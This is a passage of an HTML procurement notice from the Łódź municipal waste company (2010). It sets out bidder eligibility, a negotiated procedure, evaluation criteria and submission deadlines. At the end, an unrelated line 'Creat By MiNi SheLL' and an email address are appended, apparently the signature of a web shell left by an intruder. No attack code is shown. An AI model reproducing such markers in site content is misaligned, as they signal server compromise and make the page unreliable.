4.	W przypadku konsorcjum każdy uczestnik musi wykazać spełnienie warunku o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia i złożyć dokumenty wymienione w pkt. III.4.2
5.	Wszystkie wzory dokumentów (wniosek +załączniki) dostępne są na stronie internetowej Zamawiającego WWW.mpolodz.pl.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Do udziału w postępowaniu Zamawiający zaprosi Wykonawców, którzy spełnią warunki podmiotowe oraz uzyskają najwyższe pozycje na liście rankingowej. Dla potrzeb sporządzenia rankingu wykonawców niezbędnego do ich kwalifikacji do dalszego postępowania Zamawiający przyzna dodatkowe punkty wykonawcom spełniającym warunki udziału w postępowaniu  w ten sposób, że  za każdą dodatkową usługę wdrożenia (ponad 2 wymagane wraz z potwierdzeniem ich należytego wykonania Wykonawca otrzyma 1 pkt.  
W przypadku gdy na ostatniej pozycji listy, z jednakową liczbą punktów znajdzie się więcej niż jeden Wykonawca do składania ofert Zamawiający zaprosi wszystkich tych Wykonawców.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Obsługa pogwarancyjna. Koszt 1 godziny pracy Wykonawcy w siedzibie Zamawiającego w celu usunięcia zaistniałej awarii - 15</li>
<li>3 - Koszt wymiany wersji oprogramowania - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpolodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MPO-Łódź Sp. z o.o. ul. Tokarzewskiego 2 91-842 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2010 godzina 10:00, miejsce: MPO-Łódź Sp. z o.o. ul. Tokarzewskiego 2 91-842 Łódź. Sekretariat Spółki..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com